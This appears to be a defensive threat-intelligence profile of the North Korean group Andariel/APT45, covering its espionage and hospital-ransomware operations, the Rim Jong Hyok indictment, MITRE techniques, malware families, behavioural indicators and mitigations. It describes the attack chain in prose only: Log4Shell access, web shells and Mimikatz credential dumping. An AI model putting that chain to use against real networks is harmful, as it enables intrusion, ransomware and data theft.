analyst@ nohacky:~/threat-actors $
cat/ threat-actors/ andariel-apt45
analyst@nohacky:~/andariel-apt45.html
active profile
type Nation-State
threat_level High
status Active
origin North Korea — RGB 3rd Bureau
last_updated 2026-03-26
AN
andariel-apt45

Andariel / APT45

also known as: Onyx Sleet Silent Chollima Stonefly Plutonium (Microsoft, retired) Nickel Hyatt Clasiopa DarkSeoul TDrop2 G0138

One of North Korea's longest-running cyber units, operating since at least 2009 and elevated to formal APT status (APT45) by Mandiant in July 2024. Andariel pursues two missions simultaneously: stealing classified military and nuclear technology from defense, aerospace, and engineering targets across the US, South Korea, Japan, and India — and funding those operations by running ransomware attacks against US healthcare providers. Mandiant's principal analyst Michael Barnhart distilled the unit's primary function precisely: "When Kim Jong Un demands better missiles, these are the guys who steal the blueprints for him." DOJ indicted Rim Jong Hyok in July 2024 for his role in the Maui ransomware hospital attacks and the downstream espionage operations those funds enabled.

attributed origin North Korea — RGB 3rd Bureau, Pyongyang and Sinuiju
apt designation APT45 — elevated by Mandiant, July 25, 2024
active since At least 2009
primary espionage targets Defense, aerospace, nuclear, engineering entities
ransomware targets US healthcare providers (funds espionage operations)
doj indictment Rim Jong Hyok — July 2024 (Kansas City grand jury)
sk defense breach 83 South Korean defense companies 2022–2023
us treasury sanction Sanctioned 2019 for "cybercrime and targeting ROK government"
critical infra distinction Most frequently observed DPRK group targeting critical infrastructure

Overview

Andariel / APT45 is the North Korean state's dedicated military technology acquisition unit — an organization whose operational purpose is to supply the technical intelligence needed to advance North Korea's weapons programs by stealing it from the organizations that developed it. While APT38 / BeagleBoyz is tasked with generating revenue through financial theft, and APT37 / ScarCruft is tasked with domestic political surveillance, Andariel's mission is framed by Mandiant in explicitly military terms: it answers Kim Jong Un's requirement for better missiles, better tanks, better radar systems, better anti-aircraft weapons — by stealing the blueprints, specifications, engineering documents, and design drawings from the institutions that built them.

The group has been operational since at least 2009, making it one of North Korea's oldest continuously operating cyber units. Its early work consisted of destructive attacks against South Korean organizations and classic espionage against government and defense targets. Over more than fifteen years, it has evolved through multiple phases — expanding from South Korean targets to US, Japanese, and Indian defense and nuclear facilities, adding a financially motivated ransomware component to fund its espionage operations, and most recently targeting healthcare and crop science sectors in ways that reflect the DPRK's own domestic priorities.

Mandiant's elevation of Andariel to APT45 status in July 2024 coincided with a coordinated advisory from the FBI, CISA, NSA, US Cyber Command, the UK's NCSC, and allied agencies — explicitly documenting the group's focus on stealing nuclear technology, anti-aircraft specifications, missile system data, and broader military intellectual property. The same week, the DOJ indicted Rim Jong Hyok for the Maui ransomware healthcare attacks — the operation by which Andariel funds its espionage activities. The combination of simultaneous espionage and ransomware missions on the same infrastructure, against the same victims, in the same day, is documented in the CISA advisory as a confirmed operational pattern.

the dual-mission model

Andariel is unusual among the actors in this series because it runs two completely different operations using the same infrastructure and personnel: (1) long-duration espionage to steal military and nuclear technology for Pyongyang's weapons programs, and (2) short-duration ransomware attacks against US hospitals to generate the cryptocurrency needed to pay for the infrastructure and tools used in mission (1). These missions are not sequential — CISA documented that Andariel has conducted both on the same day against the same victim. The money from ransomware hospital attacks buys VPS servers, tools, and operational infrastructure. Those servers and infrastructure are then used to exfiltrate classified defense technology. A hospital in Kansas is simultaneously funding and enabling the theft of US Air Force technical specifications.

The Espionage Mission: What Andariel Steals

The CISA/FBI/NSA July 2024 joint advisory provided the most detailed public accounting of Andariel's actual intelligence collection requirements — the categories of technical information Pyongyang has specifically tasked the group to acquire.

  • Contract specifications and bills of materials for defense systems — the detailed component lists and engineering specifications for weapons platforms, covering both what a system is made of and how those components interact.
  • Project details and design drawings — engineering drawings, CAD files, technical specifications, and design documentation for military equipment including heavy and light tanks, self-propelled howitzers, light strike vehicles, ammunition supply vehicles, infantry fighting vehicles, and associated systems.
  • Missile and missile defense systems — technical data on missile guidance systems, propulsion, warheads, and counter-missile platforms, including radar system specifications relevant to missile defense.
  • Nuclear program data — information stored in government nuclear research facilities and nuclear power plants, including uranium processing and enrichment data, nuclear power plant configurations, and nuclear weapons research documentation. The Dtrack backdoor's deployment at India's Kudankulam Nuclear Power Plant in 2019 is the documented operational example — one of the few confirmed instances of North Korean operators accessing nuclear power plant infrastructure.
  • Drone and autonomous system specifications — technical data on unmanned aerial vehicles, their guidance systems, and drone defense technologies.
  • Anti-aircraft weapon systems — the Seoul Metropolitan Police specifically attributed theft of anti-aircraft weapon system specifications from South Korean companies to APT45 in December 2023.
  • Healthcare and pharmaceutical research — Mandiant notes that Andariel continued targeting healthcare and pharmaceutical companies after other DPRK groups pivoted away, suggesting an ongoing mandate. This may reflect collection requirements for North Korea's domestic health system or for understanding vaccine and treatment technologies relevant to the country's isolated population.
  • Crop science research — the 2020 targeting of a multinational corporation's crop science division is assessed as related to North Korea's agricultural crisis, suggesting Andariel's collection requirements extend to any technology that addresses the regime's domestic vulnerabilities.

The specific intelligence value of these targets is direct and immediate: North Korea's weapons programs do not develop in isolation. Every missile test, every artillery system, every nuclear advance draws on technical data acquired by units like Andariel from the countries it targets. The Mandiant assessment that "many advances in North Korea's military capabilities in recent years can directly be attributed to APT45's successful espionage efforts" is a statement with specific geopolitical weight — these are not hypothetical future threats but documented contributions to the DPRK's existing weapons capability.

Ransomware as Operational Funding

Andariel's model of using ransomware attacks against US healthcare providers to fund its espionage infrastructure represents a distinct operational structure unique among documented APT groups — a state-sponsored espionage unit self-financing its operations through cybercrime against civilian medical institutions.

  • The Mechanism: Andariel operators compromise US healthcare organizations using Log4Shell (CVE-2021-44228) and similar vulnerabilities to gain initial access, deploy Maui ransomware to encrypt systems used for medical testing, electronic records, and patient care, and demand Bitcoin ransom payments. The encrypted hospital systems prevent patients from receiving timely care — a documented patient safety consequence explicitly acknowledged in the DOJ's characterization of the Rim Jong Hyok indictment. When victims pay, the cryptocurrency is laundered through Hong Kong-based facilitators, converted to Chinese yuan, and withdrawn from ATMs in China near the Sino-Korean Friendship Bridge between Dandong and Sinuiju — a laundering route that physically crosses the border into North Korea. The resulting funds purchase VPS infrastructure used in subsequent defense sector espionage operations.
  • Scale: The Rim Jong Hyok indictment documented Andariel targeting five US healthcare providers, four US defense contractors, two US Air Force bases, and NASA's Office of Inspector General — all using infrastructure purchased with hospital ransom proceeds. In a single documented case, a November 2022 cyber attack on a US defense contractor resulted in the exfiltration of more than 30 gigabytes of technical data. The ransomware and espionage infrastructure were directly connected: the VPS servers bought with ransom payments hosted the C2 infrastructure for the defense contractor intrusions.
  • Maui Ransomware: Maui is a ransomware strain that Andariel operators manually execute on victim systems rather than deploying as a self-propagating worm — requiring an active operator presence in the victim network. CISA first documented Maui in a July 2022 advisory after multiple healthcare providers were attacked. Maui encrypts targeted files using AES-128, RSA-2048, and XOR encryption. Unlike criminal ransomware that broadcasts ransom demands, Maui targets specific files identified by operators during the manual execution phase, reflecting the operator's prior knowledge of the victim's network from the initial Log4Shell intrusion phase.
  • Simultaneous Operations: CISA's advisory explicitly documented that Andariel has launched ransomware attacks and conducted cyber espionage operations on the same day against the same entity — using the same compromised infrastructure for both ransom extortion and technical data exfiltration. This blurring of criminal and espionage activity within a single operation represents an unusual organizational model that creates specific legal and attribution challenges for responding agencies.

Known Campaigns

Kudankulam Nuclear Power Plant — Dtrack Intrusion 2019

Andariel deployed the Dtrack backdoor (also known as Valefor and Preft) against India's Kudankulam Nuclear Power Plant — one of the few publicly confirmed instances of North Korean cyber operators successfully accessing nuclear power plant infrastructure. Kudankulam, a Russian-built plant in Tamil Nadu, India, had its administrative network compromised. Indian authorities initially denied the breach before later confirming it after Kaspersky identified Dtrack in the wild connected to the plant's network. The targeting of nuclear power plant infrastructure is consistent with Andariel's documented collection mandate for nuclear technology data — specifically plant configurations, operational procedures, and infrastructure documentation relevant to North Korea's own nuclear program development.

Maui Ransomware — US Healthcare Sector May 2021 – April 2023

From May 2021 through at least April 2023, Rim Jong Hyok and Andariel co-conspirators used Maui ransomware and the Log4Shell vulnerability to attack US hospitals and healthcare providers, encrypting files used for medical testing and electronic patient records and demanding Bitcoin ransoms. Documented victims include five healthcare providers, four US defense contractors, two US Air Force bases, and NASA-OIG. A Kansas hospital was specifically identified in the Rim Jong Hyok warrant as a target. The FBI, working with NASA-OIG's Cyber Crimes Division, traced the operation by retracing attacker commands on compromised systems, identifying a password that unlocked the encrypted files the hackers used to stage exfiltrated data. Ransom proceeds were laundered through Hong Kong facilitators and ATMs near the China-North Korea border. US cybersecurity firm Mandiant noted that upon seeing the success of ransomware attacks against medical entities by other groups, APT45 began using similar off-the-shelf ransomware — demanding ransom amounts consistent with typical criminal ransomware incidents regardless of victim size.

83 South Korean Defense Companies 2022 – 2023

South Korea's government warned in April 2024 that Andariel spent the majority of 2022 and 2023 infiltrating the networks of 83 South Korean defense companies or their contractors — an extraordinary sustained campaign against the South Korean defense industrial base. Companies targeted produced or contracted for systems including anti-aircraft weapon platforms, armored vehicles, and artillery systems. The Seoul Metropolitan Police specifically accused APT45 in December 2023 of stealing sensitive specifications for South Korean anti-aircraft weapon systems as part of this campaign. The scale — 83 organizations over two years — reflects a systematic effort to map and penetrate the entire South Korean defense manufacturing supply chain rather than targeting individual high-value organizations opportunistically.

US Air Force and NASA-OIG Intrusions 2022 – 2023

Using infrastructure purchased with Maui ransomware proceeds, Andariel successfully breached two US Air Force bases and NASA's Office of Inspector General. The Air Force intrusions were specifically aimed at accessing technical data on aerospace systems — consistent with Andariel's documented collection requirements for drone and aircraft technology. The NASA-OIG compromise was investigated by NASA's own Cyber Crimes Division, whose analysis of attacker commands on compromised systems contributed to the identification and July 2024 indictment of Rim Jong Hyok. These intrusions represent Andariel's direct targeting of US government military and space technology infrastructure — not South Korean or allied-country targets but the United States itself.

Crop Science Division — Multinational Corporation 2020

Andariel targeted the crop science division of an unnamed multinational corporation in 2020 — an unusual targeting choice for a military espionage unit that Mandiant assesses as likely reflecting North Korea's acute agricultural crisis. North Korea closed its borders in early 2020 due to the COVID-19 pandemic, eliminating cross-border food trade and significantly exacerbating the country's food security situation. The targeting of crop science intellectual property — potentially including high-yield seed varieties, fertilizer technology, or agricultural management systems — suggests Andariel's collection requirements are responsive to the regime's domestic vulnerabilities as well as its weapons programs.

Tactics, Techniques & Procedures

mitre id technique description
T1190 Exploit Public-Facing Application — Log4Shell The documented primary initial access technique in Andariel's dual ransomware-espionage operations is exploitation of CVE-2021-44228 (Log4Shell) — a critical remote code execution vulnerability in the widely-used Apache Log4j logging library. CISA's advisory and the Rim Jong Hyok indictment both specifically cite Log4Shell as the initial access vector for hospital and defense contractor intrusions. From late 2021 through 2023, Andariel used Log4Shell to compromise web servers, deploy web shells for persistent access, and then pivot into internal networks for both ransomware deployment and technical data exfiltration. The vulnerability's prevalence — Log4j is embedded in countless enterprise Java applications — gave Andariel broad access to targets across healthcare, defense, and government sectors from a single exploit.
T1505.003 Web Shell — Post-Exploitation Persistence After gaining initial access via Log4Shell or other public-facing application exploitation, Andariel deploys web shells to maintain persistent access to compromised servers. The web shell provides a stable reentry point to the victim's network that persists even if the initial Log4Shell-exploited application is patched. CISA documented that Andariel deploys web shells specifically to "gain access to sensitive information and applications for further exploitation" — using the web shell as both a persistence mechanism and a staging point for lateral movement toward the internal network segments containing the target data.
T1003 Credential Dumping — Mimikatz and Common Tools After establishing web shell access, Andariel escalates privileges and moves laterally using common credential dumping tools including Mimikatz. CISA's advisory documents this as part of the standard post-exploitation pattern: initial access via Log4Shell, web shell deployment, then privilege escalation via credential dumping tools to obtain domain administrator credentials, followed by lateral movement to reach both the data targeted for espionage exfiltration and the systems targeted for ransomware encryption. The use of commodity tools like Mimikatz alongside custom malware like Maui and Dtrack reflects a mixed toolkit approach where off-the-shelf tools handle standard intrusion tasks and custom tools handle the specialized missions.
T1486 Data Encrypted for Impact — Maui Ransomware Maui ransomware is deployed via manual operator execution after establishing network access — distinguishing it from self-propagating criminal ransomware. Operators identify and specifically target files used for medical testing systems and electronic health records before executing Maui's encryption. The manual deployment approach means operators have already mapped the victim's network and identified the highest-value files for encryption before the ransom demand is created. Maui uses a combination of AES-128, RSA-2048, and XOR encryption. Unlike criminal ransomware with automated propagation, each Maui deployment is an active operator decision — reflecting the espionage-style operational patience characteristic of Andariel's culture.
T1041 Exfiltration — Defense Technical Data Collection The espionage mission executes data exfiltration of technical documents including contract specifications, bills of materials, design drawings, engineering documents, and project details from defense and nuclear organizations. The CISA advisory documents that the information collected "has military and civilian applications" and directly contributes to DPRK's weapons programs. A single documented November 2022 defense contractor intrusion resulted in over 30 gigabytes of data exfiltration. Data is exfiltrated through VPS servers purchased with ransomware proceeds — creating a direct financial link between the healthcare ransomware operations and the defense espionage infrastructure.
T1027 Obfuscated Files — Custom Encoding and Code Reuse Andariel malware exhibits a distinct genealogy of code reuse, custom encoding, and unique passwords across tool families — a pattern Mandiant uses as a key attribution indicator to distinguish APT45 from other DPRK-nexus groups. Microsoft's advisory on Onyx Sleet documents the group as "constantly evolving its toolset to add new functionality and implement novel ways to bypass detection" while maintaining a "fairly uniform attack pattern." The combination of evolving detection evasion with stable underlying attack patterns creates a recognizable operational fingerprint despite ongoing tool updates.
T1583.003 Acquire Infrastructure — Ransom-Funded VPS Procurement The documented financial model: hospital ransom proceeds are laundered through Hong Kong facilitators, converted to yuan, and withdrawn from ATMs near the Sino-Korean Friendship Bridge. The resulting funds purchase virtual private servers that serve as C2 infrastructure for subsequent defense sector espionage operations. This creates a traceable financial chain — from hospital Bitcoin payment to VPS server purchase to Air Force base intrusion — that the DOJ and FBI specifically documented in the Rim Jong Hyok indictment and that gave investigators the evidentiary thread connecting the ransomware operations to the defense espionage campaigns.

DOJ Indictment — Rim Jong Hyok

On July 25, 2024, a grand jury in Kansas City, Kansas returned an indictment against Rim Jong Hyok, a North Korean national and Andariel unit member, for his role in the conspiracy to hack US hospitals, extort ransoms, launder the proceeds, and use those proceeds to fund espionage operations against US government and defense targets.

  • Charges and sentencing exposure: Conspiracy to commit computer hacking (maximum 5 years) and conspiracy to commit money laundering (maximum 20 years) — a combined maximum exposure of 25 years. The indictment specifically frames the ransomware extortion and the downstream espionage as a single conspiracy with two operational phases rather than two separate criminal activities.
  • Documented victims — 17 total: Five US healthcare providers (including a Kansas hospital, and providers in Arkansas, Florida, Colorado, and Connecticut), four US defense contractors, two US Air Force bases (Randolph Air Force Base, Texas and Robbins Air Force Base, Georgia), and NASA's Office of Inspector General. Total: 17 identified victims across 11 US states plus additional entities in Taiwan, South Korea, and China.
  • NASA intrusion specifics: Rim and co-conspirators had access to NASA's computer systems for more than three months, extracting over 17 gigabytes of unclassified data during that period. The NASA-OIG's own Cyber Crimes Division contributed forensic analysis to the investigation.
  • The laundering chain: Rim and co-conspirators laundered ransom payments through Hong Kong-based facilitators who converted cryptocurrency to Chinese yuan. The yuan was then accessed from ATMs in China in the immediate vicinity of the Sino-Korean Friendship Bridge — a laundering route that the indictment describes as leaving a physical trail within meters of the North Korean border. In at least one case, laundered funds were used to purchase VPS servers that were then used to exfiltrate data from defense contractor networks.
  • Status and reward: Rim Jong Hyok is not in US custody. A federal arrest warrant has been issued. The State Department's Rewards for Justice program offers up to $10 million for information leading to his identification or location — the same reward level offered for Bybit hacker attribution and APT38 defendants.
  • Context — Song Kum Hyok (2025): In 2025, US Treasury sanctioned Song Kum Hyok, a 38-year-old North Korean national based in China's Jilin province, for involvement in both the APT45 organization and in North Korea's fraudulent IT worker scheme — connecting Andariel's technical operations to the DPRK's broader revenue-generation infrastructure of placing fake IT workers in Western companies.

Tools & Malware

  • Dtrack (Valefor / Preft): A persistent backdoor that is Andariel's most documented custom espionage tool. Dtrack provides remote access, keylogging, screenshot capture, file system enumeration, and command execution. It was first publicly identified through its deployment at the Kudankulam Nuclear Power Plant in 2019. Dtrack is strongly associated with APT45 attribution — it forms part of the distinct malware genealogy that separates Andariel's toolkit from other North Korean groups. The backdoor has appeared across defense, nuclear, and research sector intrusions over multiple years.
  • Maui Ransomware: Operator-executed ransomware used specifically against US healthcare providers to generate ransom proceeds. Maui uses AES-128, RSA-2048, and XOR encryption to encrypt victim files. It is deployed manually by operators who have already mapped the victim network — a characteristic that distinguishes it from criminal ransomware with automated propagation. CISA first documented Maui in a July 2022 advisory. Unlike most ransomware, Maui does not broadcast ransom demands automatically — operators manually communicate ransom demands to victims after deployment.
  • SHATTEREDGLASS: A ransomware family documented by Kaspersky in June 2021, linked by Mandiant to suspected APT45 clusters. SHATTEREDGLASS has been used against entities in South Korea, Japan, and the US — predating the Maui ransomware campaign and suggesting Andariel's ransomware development began before the more widely documented Maui operations.
  • TigerRAT: A backdoor used for information theft and command execution, including keylogging and screen recording from C2 server direction. Documented by Microsoft in its Onyx Sleet analysis as part of the group's core toolset alongside Dtrack.
  • ValidAlpha (Black RAT): A Go-based backdoor capable of running arbitrary files, listing directory contents, downloading files, taking screenshots, and launching shell access for arbitrary command execution. Documented by Microsoft alongside TigerRAT as part of the Onyx Sleet toolkit.
  • 3PROXY: A publicly available proxy tool used in APT45 operations for tunneling traffic through compromised systems — consistent with Mandiant's documentation of the group using a mix of public tools, modified tools, and custom malware.
  • ROGUEEYE: A backdoor based on modified publicly available malware, documented by Mandiant as part of APT45's arsenal. The modification-of-public-tools approach appears consistently across APT45's toolkit alongside fully custom tools like Dtrack.
  • Web Shells: Post-exploitation web shells deployed after initial Log4Shell access, providing persistent access to compromised servers. Used as staging points for lateral movement into internal network segments.

Indicators of Compromise

IOCs from CISA joint advisory AA24-207A (July 2024), the Rim Jong Hyok DOJ indictment, CISA Maui ransomware advisory (2022), Microsoft Onyx Sleet advisory, and Mandiant APT45 research. The CISA advisory includes a VirusTotal collection of APT45-related indicators. Full IOC tables including file hashes, domains, and IP addresses are in the advisories linked in Sources.

behavioral and technical indicators
cve CVE-2021-44228 (Log4Shell) — primary documented initial access vector; exploitation of Log4j JNDI injection on internet-facing Java application servers is the documented Andariel entry point for both healthcare ransomware and defense espionage operations
ransomware Maui ransomware — operator-executed against healthcare provider systems; manually executed ransomware with no automated propagation; presence of Maui on any healthcare network is a confirmed Andariel indicator
backdoor Dtrack (Valefor / Preft) — Andariel's signature espionage backdoor; presence on defense, nuclear, aerospace, or engineering sector networks is a high-confidence APT45 indicator
behavior Simultaneous ransomware and data exfiltration against the same victim — CISA documented Andariel conducting both operations on the same day; a ransomware attack on a defense or healthcare organization coinciding with unusual outbound data transfers should be investigated as potential Andariel dual-mission operation
behavior Mimikatz execution on web server hosts following Log4j exploitation — standard Andariel lateral movement escalation path; credential dumping immediately after web shell deployment is a documented pattern
web shell Web shell deployment on Log4j-exploitable Java application servers — Andariel persistently deploys web shells as second-stage access; monitor for web shell artifacts on all internet-facing Java application servers following Log4Shell patching
exfil target Bulk access to contract specifications, bills of materials, design drawings, and engineering documents — Andariel's documented collection requirements; DLP alerts on bulk access to these document types from unusual accounts or external transfers warrant investigation

Mitigation & Defense

Andariel's dual-mission model creates two distinct defensive contexts with different urgencies: healthcare organizations face ransomware that disrupts patient care, while defense, aerospace, nuclear, and engineering organizations face technical data theft that contributes to weapons program advancement. Both require active defensive measures.

  • Patch Log4j Completely — Everywhere: The Log4Shell vulnerability (CVE-2021-44228) is Andariel's documented primary initial access vector across both its healthcare ransomware and defense espionage operations. Three years after the vulnerability's disclosure, unpatched Log4j instances remain in enterprise environments embedded in third-party applications, legacy systems, and vendor software where direct patching is not straightforward. Conduct a comprehensive Log4j asset inventory using available scanning tools — not just searching for obvious Log4j jar files but examining all Java applications and container images for any version of Log4j in their dependency chain. Unpatched Log4j on any internet-facing system is a confirmed Andariel access vector that must be remediated or isolated.
  • Healthcare Sector — Maui Ransomware Detection: Maui is operator-executed rather than auto-propagating, meaning it appears on victim systems only after an operator has already achieved network access and mapped the environment. Detection must occur before Maui execution — not by detecting Maui itself but by detecting the precursor compromise indicators: web shell deployment on Log4j-vulnerable servers, credential dumping with Mimikatz, and lateral movement toward systems hosting medical testing and EHR data. CISA's Maui advisory (2022) provides specific detection signatures. Any healthcare organization that identifies Log4j exploitation on their web servers should treat this as a potential Andariel intrusion requiring immediate incident response rather than a standalone vulnerability patching event.
  • Defense and Nuclear Sector — Technical Data Protection: Andariel's specific collection requirements — contract specifications, design drawings, bills of materials, engineering documents — are well-documented. Implement data loss prevention controls specifically tuned to detect bulk access or exfiltration of these document types from engineering and project management systems. Apply need-to-know access controls to sensitive technical documents — users should not have access to specifications for weapons systems they are not currently working on. Network segmentation between general corporate IT and engineering workstations that hold classified or sensitive technical data limits lateral movement toward the target documents even after initial access is achieved.
  • Segment Nuclear Infrastructure from IT Networks: The Kudankulam Nuclear Power Plant compromise occurred via the administrative network — not the plant control network — but still gave Andariel access to infrastructure documentation. Nuclear facilities and other critical infrastructure organizations should maintain hard network segmentation between administrative/corporate IT networks and operational technology networks, with no direct connectivity. Any data transfer between IT and OT environments should require explicit authorization and monitoring.
  • Post-Compromise Detection for Long-Dwell Espionage: Andariel's espionage operations involve extended network presence for data collection and exfiltration — not a quick ransomware-and-exit pattern. Proactive threat hunting in defense and nuclear sector networks, specifically looking for Dtrack backdoor indicators, unusual outbound connections from workstations handling sensitive technical documents, and anomalous authentication patterns on engineering data repositories, can detect Andariel intrusions before the exfiltration phase completes. Engagement with sector-specific ISACs (Defense-ISAC, Nuclear Energy ISAC) for sharing of Andariel-specific indicators is a recommended practice in the CISA advisory.
analyst note

Andariel's dual-mission model has a policy implication that extends beyond cybersecurity. When a hospital in Kansas pays a ransomware demand to restore access to its patient records, that payment — after laundering — funds the purchase of infrastructure used to exfiltrate US Air Force technical specifications and NASA research data. The hospital's decision to pay ransomware is not merely a business continuity choice; it is an inadvertent contribution to North Korea's weapons programs. This is not a hypothetical — it is the documented operational model that the DOJ indictment against Rim Jong Hyok made explicit in July 2024. The implication for healthcare sector cybersecurity investment is significant: improving healthcare organizations' defenses against initial compromise is not simply about protecting patient data or ensuring care continuity. It is about closing the funding pipeline that enables the theft of US defense technology. For the defense and nuclear sectors, the parallel implication is equally direct: Mandiant's assessment that North Korea's military capability advances can be directly attributed to APT45's espionage is a statement about what is at stake in defending engineering workstations and technical document repositories. The blueprints are the weapons.

Sources & Further Reading

Attribution and references used to build this profile.

— end of profile